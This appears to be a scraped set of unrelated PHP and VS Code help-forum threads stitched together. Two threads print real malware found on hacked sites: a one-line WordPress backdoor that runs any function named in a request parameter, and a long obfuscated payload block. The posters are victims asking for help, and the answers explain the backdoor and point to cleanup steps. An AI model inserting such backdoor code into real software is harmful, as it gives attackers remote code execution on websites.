Please help, I'm going crazy.
I added a user snippet to help me add opening PHP tags a long time ago. Now, I can't get rid of it. I have uninstalled vs code several times, deleted known vs code folders including the whole %home%\.vscode folder and the %appdata%\roaming\code folder.
I have used advanced installer to clean up program residue files, yet, this snippet appears every time.
The crazy thing is, if I switch to my administrator account, the snippet doesn't exist but I do all my coding on my windows standard user account. It's driving me crazy!!
What do I do?
See screenshot below.
PHP snippet
This is not a snippet: Types of Completions.
Related
Any help is very appreciated.
Short story:
I would like some help trying to understand what this line of code is intended to do.
extract($_REQUEST)&&#$shall(stripslashes($shall))&&exit;
I deciphered most of it except the $shall part. $shall does not appear anywhere else and I did not go into details of reading WordPress code.
The line appeared in the below files as the first line right after <?php
Long story:
I have a site that runs on WordPress and it randomly broke with errors in 2 WordPress files. The filenames are
.../wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php
.../wp-includes/blocks/block.php
It is not present in WordPress GitLab file versions. We did not initiate any WordPress updates, etc. I commented out the line in both files and all is back to normal.
Any ideas as to how/why/for what purpose this line would appear there?
If ($_REQUEST['shall']="something") then $shall will equal string 'something' after the extract part. If there's a function called something it will execute. So basically all wordpress functions are available for this script. This is a back door for a malware no doubt. Not good.
Search in google found record of the file name somewhere, however before you remove it be ready for it to re-appear if you haven't fixed your vulnerabilities.
OK, so on some of the pages on my site, I've included a foot.php file at the end so that when I make changes to it, it effects all pages on the site. On most pages, this works perfectly, but on some pages, it just cuts off, and no includes after it take effect. The weird thing is that it includes only a portion of the file on pages where this happens.
I thought it might be because of the number of includes I used, but I have pages with more that work just fine. Take for instance, this one:
http://www.kelvinshadewing.net/codeSquirrel5.php
Here, you can see the bottom gets cut off, and if you view the source code, the rest of what goes in that div is gone, yet the div itself is closed off properly. But then go here:
http://www.kelvinshadewing.net/sprTartii.php
You'll see that the full code is there, and the Disqus app is present as well. This issue has been going on since before I added Disqus, and also happened when I'd been using includes in a different way to generate global content, so it's something about those pages in particular. It does it with only my Squirrel tutorials, and nothing else. I'm totally stumped and have no idea what's causing this. I've gone over my code a dozen times, and verified that every page uses the same PHP scripts.
As for the scripts themselves, it's just this:
<?php include "foot.php";
include "disqus.php"; ?>
The problem just disappeared, so I'm ruling it as a server glitch. If anyone else is reading this, I suggest checking out Andrew's comment, because that code was nice to know.
I'm not a pro with PHP
I'm not a pro with Webservers
Recently someone, somewhere has been managing to upload PHP spam scripts to my server. Though I can easily locate and delete these scripts, I can't figure out how they're working or where the backdoor is that leads the hacker back in to my server.
The script files uploaded declare a variable with every letter, number and symbol and then use arrays spell out the code that executes. For the past three days I've been manually trying to decode this but I'm getting sick and desperate of finding out what the code does in order to hopefully give me an insight in to how to fix my issue.
Can anyone help? Does anyone know something out there that can decode this for me? I'm only pasting a small part of the code so you can see what I mean. It's very, very long.
$z26="jmiO#sxhFnD>J\r/u+RcHz3}g\nd{^8 ?eVwl_T\\\t|N5q)LobU]40!p%,rC-97k<'y=W:P\$1BI&S6\"E(K`Y~.Q;f[v2a#X*ZAGtM";
$GLOBALS['zkmxz95'] = $z26[2].$z26[60].$z26[7].$z26[34].$z26[5].$z26[69].$z26[59];
$GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[40].$z26[3] , 5);
The above code, when decoded manually is:
define(SOCKET_TYPE_NO,5);
Recently someone, somewhere has been managing to upload PHP spam
scripts to my server....
Carefully follow https://codex.wordpress.org/FAQ_My_site_was_hacked
I had this code appear on ALL my php pages. on top line.
%x5c%x782f7rfs%x5c%x78256>1*!%x5c%x7825b:>1!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25660%x6c%157%x64%145%x28%141%x72%162%x61%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825c%x782fh%x5c%x7825:s%x5c%x7825qx5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!1>2*!%x5c%x7825z>32j%x5c%x7825!*3!%x5c%x782%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**6R85,67R37,18R#>q%x5c%x7825V!#]y76]277]y72]bnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUIdof%x5c%x786057ftbc%x5c%-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!%x5c%x782f7&6|7**111127-K)ebf825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2b%x5c%x7825!*##>>X)!gjZb%x5c%x7h#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x73)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c6]277##]y74]273]y76]252]y85]2^%x5c%x7824-%x5c%x7824tvctus)%xx5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)sboepn)%x5c%x7825epnbs#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x782c#!%x5c%x7824Yppfepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%xx7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x78%62%x35%165%x3a%146%x21%76%x21%50%x5#!bssbz)%x5c%x7824]25%x5c25)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:5c%x78256!#]D6M7]K3#n%x5c%x7825#]y3g]61]y3f]63]y3:]68]y76#%x5c%x7825s:%x5c%x785c%x5c%x7825j:^j%x5c%x825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjux7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudov%x5c%x7825*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7+9f5d816:+946:ce44#)zbssb!>!ss%x7825!|!*)323zbek!~!b%x554]y76#!#]y84]275]y83]273]y75c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^56]y6g]257]y86]267]y74]275]y7:]268]y7f#!%x%x7825-bubE{h%x5c%x7825)%x75%156%x61"]=1;
function
fjfgg($n){r25)3of:opjudovg!%x5c%x78242178}54+9**-)1%x5c%x782f298V,62bd%x5c%xubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsfvr#7824!>!fyqmpef)#%x5c%x7824*!#]y3d]51]y35]2FSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5ceturn chr(ord($n)-1);}
#er}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%f%163%x70%154%x69%164%50%x22%134x61%156%x75%156%x61"]))))
8y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x787824y7%x5c%x7824-%x5c%x782ror_reporting(0);
preg_replace("%x2f%50%x2e%52%x29%57%xx7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!u%x5c%x782%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x65","%x65%166%x61%154%x28%151%x6d%1ozcYufhA%x5c%x78272qj%x5c%x7825611!2p%x5c%x7825!*3>?*2b%85]82]y76]62]y3:]84#-!OVMM*>%x5c%x7822!ftmbg)!gjj%x5c%x7825!|!5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]7#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]76!#46767~6#]D6]281L1#%x5c%x782f#M5]DgP5]D6##]D4id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256>%x5c%x7822:ftmbg39*x782f7###7%x5c%x782f7^#i25!-#2#%x5c%x782f#%x5c%x7825#%x!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2JU,6:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{oj%x5c%x78256!%x5c%x7825i%x5c%x785c2^U#c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x7827&6!tussfw)%x5|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x5c%x7827&6!2p%56]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4>.%x5c%x7825!EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}825fdy)##-!#~%x5c%x7825s:%x5c%x785c%xd]252]y74]256]y39]252]y83]273]y72]282#%x5c%x78*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!}&;!osvufs}x5c%x7825w:!>!%x5c%x7826,47R57,27R66,#%x5c%x5c%x782400~:>!}W;utpi}Y;tuoc%x7827&6%x5c%x7825fdy!%x5c%xx5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%jojRk3%x5c%x7860{666~6j%x5c%x7825!*9!%xx7878::h%x5c%x7825::iuhofm%xx5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]2#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x782%163%x74%141%x72%164")
&&
(!isset($GLOBALS["%g)!gj!|!*msv%x5c%x7825)}k%x78256%x5%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x4*12q%x5c%x7825#]y31]278]y3e]815c%x7860un>qp%x5c%x7825!|Z~!!2p%x5c825j>1#p#%x5c%x782f#p#%x5c%x782f%x5c%x74-%x5c%x7824]26%x5c%x7824-%x5c%x7824j%x5c%x7825!q%x]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#!%x5c%x7825yy%x5c%x7825w6Z6>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x78253]83]238M7]381]211M5]67]452]88]5]48]32M3]317]44U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78*2-4-bubE{h%x5c%x7825)sutcvt)esp>hmx5c%x7860UQPMSVD!-id%5c%x7825j:.2^,%x5c%x7825b:
I have subdomains that had wordpress installed and some that didn't. It effected all sites?
I was able to restore my non wordpress subs. Anyclue what this is and how I can prevent in the future.
Thanks in advance.
That looks a lot like the obfuscated malicious code that I found in my own Wordpress site. Maybe consider these steps http://codex.wordpress.org/FAQ_My_site_was_hacked.
Try running the full code through this decoder http://ddecode.com/phpdecoder/ or scanning your site with the free Sucuri SiteCheck. You could also upload one of those files to https://www.virustotal.com.
btw, I have no affiliation with either of these sites. I only found them useful in my own situation.
Good luck!
I have a very strange problem and i don't know what to do about it. My site seems to work just fine all browsers other than internet explorer, so i've been trying to figure out why.
I've narrowed it down to the a file that I'm including in my site, this file is a php class that has a number of different functions like login getters and setters and so on.
I took all the php code out of my pages and it renders fine, so i added the php back in line by line and released that it stopped working when i used this:
require_once 'classes/Membership2.php';
Does anyone know why some php code will be messing with the style of my website.
For more detail on the matter, i have a number of divs that are centered, they all have curved edges as well as shadows. So by taking away the php i can see that IE is loading the page properly, no incompatibilities or anything like that.
Has anyone had a problem like this before? While i'm waiting for an aswesome or two i'll be removing functions and part of the code till i can narrow it down. (I would give code, but the file has a lot of lines of code.)
Thanks for the help.
Oh yeah and I'm testing on Internet Explorer 9 and every other browser is the latest version or close enough.
Okay so i've done some more digging into this, i've found that if i delete all the code in the class (All the functions) and leave just and empty class in the include file it still doesn't work. Okay, so in my view that means the functions aren't whats making this problem. So i deleted EVERYTHING, so now the include points to a blank php file. This worked and the page rendered as it should but obviously there is no functionality, i can't login or anything like that. I decided to add a constructor instead of leaving it as default, this function does nothing but return true; and it made the site mess up again.
Does this info change anything? Also i'm reiterating the fact that i do not get this error or any other browser but Internet Explorer 9 (Haven't tried any other IE version).
Thanks again for the help.
Okay, so i've solved the problem. At the start of my PHP class i have used
<!-- blah blah blah -->
forgetting that there is only PHP in this document and no HTML. So when i include the file it just outputs that into my source code and and messes things up, should have used the PHP commenting style.
Still strange that EVERY browser other than IE just ignores this and goes about its business, even the site that #blankabout suggested didn't give me any error (Although i assure thats because its part of the included PHP file and not the HTML itself).
as #fajran says to you, save both outputs with "view source code" on the browser and compare them to find the diference. To compare outputs use winmerge or similar tool. Once you now which text it generating the trouble, modify it inside the include file.
Given that your php, because it runs on the server, should never actually reach the browser, it may very well be some unterminated HTML or similar that is causing the problem. Perhaps the PHP is causing a break in the HTML that is unexpected.